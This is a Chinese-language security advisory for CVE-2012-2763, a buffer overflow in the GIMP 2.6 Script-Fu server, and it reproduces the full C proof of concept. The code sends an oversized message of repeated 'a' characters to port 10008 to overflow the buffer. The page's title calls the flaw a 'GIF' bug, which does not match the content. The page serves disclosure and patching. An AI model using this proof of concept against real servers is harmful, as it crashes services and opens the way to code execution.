Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / GIMP GIF图形缓冲区溢出漏洞

发布日期:2012-05-31
更新日期:2012-06-01受影响系统:
GIMP GIMP 2.6.x
不受影响系统:
GIMP GIMP 2.8.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53741
CVE(CAN) ID: CVE-2012-2763GIMP是GNU Image Manipulation Program(GNU图像处理程序)的缩写,是一款跨平台的图像处理软件。GIMP 2.6.12之前版本在script-fu服务器组件的实现上存在缓冲区溢出漏洞,可影响script-fu控制台和script-fu网络服务器,成功利用后可允许攻击者通过特制的消息造成script-fu服务器缓冲区溢出,覆盖多个函数指针,导致攻击者获取EIP控制权,在受影响应用中执行任意代码。<*来源:Joseph Sheridan
 
  链接:http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html
        http://www.linuxidc.com/Linux/2012-06/61836.htm
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Joseph Sheridan ()提供了如下测试方法:////////////////////////////////////////////////////////////////
//                                                              //
// PoC for GIMP <= 2.6 Script-Fu server buffer overflow       //
// Author: Joseph Sheridan                                      //
// Date: 20/05/2012                                              //
//                                                              //
// compile with    cl scriptfubof.c /link wsock32.lib             //
////////////////////////////////////////////////////////////////#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>#define DEFAULT_PORT 10008
// TCP socket type
#define DEFAULT_PROTO SOCK_STREAM
void senddata();
void recvdata();
WSADATA wsaData;
SOCKET  conn_socket;
char Buffer[2000000];
char inBuffer[128];
   
void Usage()
{
    printf("Usage: scriptfubof servername portnumber ");
    fflush(stdout);
    exit(1);
}
 
int main(int argc, char *argv[])
{
   
    // default to localhost
    char *server_name= "localhost";
    unsigned short port = DEFAULT_PORT;
    int i, loopcount, maxloop=-1;
    int retval;
    unsigned int addr;
    int socket_type = DEFAULT_PROTO;
    struct sockaddr_in server;    if (argc < 3) {
        Usage();
    }
   
    if ((retval = WSAStartup(0x202, &wsaData)) != 0)
    {
       fprintf(stderr,"WSAStartup() failed with error %d ", retval);
        WSACleanup();
        return -1;
    }
   
    //    Get portnum
    port = atoi(argv[2]);
   
    memset(&server, 0, sizeof(server));
    server.sin_addr.s_addr = inet_addr(argv[1]);
    server.sin_family = AF_INET;
    server.sin_port = htons(port);    conn_socket = socket(AF_INET, socket_type, 0); /* Open a socket */
    if (conn_socket <0 )
    {
        fprintf(stderr,"Client: Error Opening socket: Error %d ", WSAGetLastError());
        WSACleanup();
        return -1;
    }
   
    if (connect(conn_socket, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR)
    {
        fprintf(stderr,"Client: connect() failed: %d ", WSAGetLastError());
        WSACleanup();
        return -1;
    }    // Send the data
    senddata();    // recieve a msg
    recvdata();
   
    closesocket(conn_socket);
    WSACleanup();return 0;
}void senddata() {    int loopcount = 0, retval =0;
    unsigned char command[]="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
       
   
    Buffer[0]="x47"; //Magic byte "G"
    Buffer[1]=sizeof(command)/256; //High byte of L - L div 256
    Buffer[2]=sizeof(command)%256; //Low byte of L - L mod 256
    strcpy(&Buffer[3],command);
   
    retval = send(conn_socket, Buffer, sizeof(command) +3, 0);
    if (retval == SOCKET_ERROR)
    {
        fprintf(stderr,"Client: send() failed: error %d. ", WSAGetLastError());
        WSACleanup();
        return;
    }
    else
      printf("Client: send() is OK. ");
    printf("Client: Sent data "%s" ", Buffer);
   
}void recvdata() {
    int i=0;
    int retval=0;
    memset(inBuffer,0,128);
   
    retval = recv(conn_socket, inBuffer, 128, 0);
    printf("retval is :%d ", retval);
    printf("first char is: %x ", inBuffer[0]);
    if (retval == SOCKET_ERROR)
   {
        fprintf(stderr,"Client: recv() failed: error %d. ", WSAGetLastError());
        closesocket(conn_socket);
        WSACleanup();
        return;
    }
    else {
        printf("Client: recv() is OK. ");
       
        // print the message contents...
       
        for (i=0;i<retval;i++) {
            printf("%c", inBuffer[i]);
           
        }
        printf(" ");
        fflush(stdout);
   }}建议:
--------------------------------------------------------------------------------
厂商补丁:GIMP
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.gimp.org/Linux Kernel EXT4 "ext4_fill_flex_info()"本地拒绝服务漏洞Ruby on Rails活动记录SQL注入漏洞相关资讯      GIMP  溢出漏洞  缓冲区溢出漏洞 
  • GIMP 2.8.18 发布-附安装 PPA  (今 12:05)
  • GIMP插件 G’MIC 1.7.4 发布  (07月19日)
  • GIMP修改UI,支持MyPaint画笔  (07月14日)
  • GIMP 的未来  (08月01日)
  • GIMP 2.8.18 发布,修复XCF文件引  (07月19日)
  • GIMP 2.9.3 开发版发布,开源图片  (05月06日)
本文评论 查看全部评论 (0)
表情: 姓名: 字数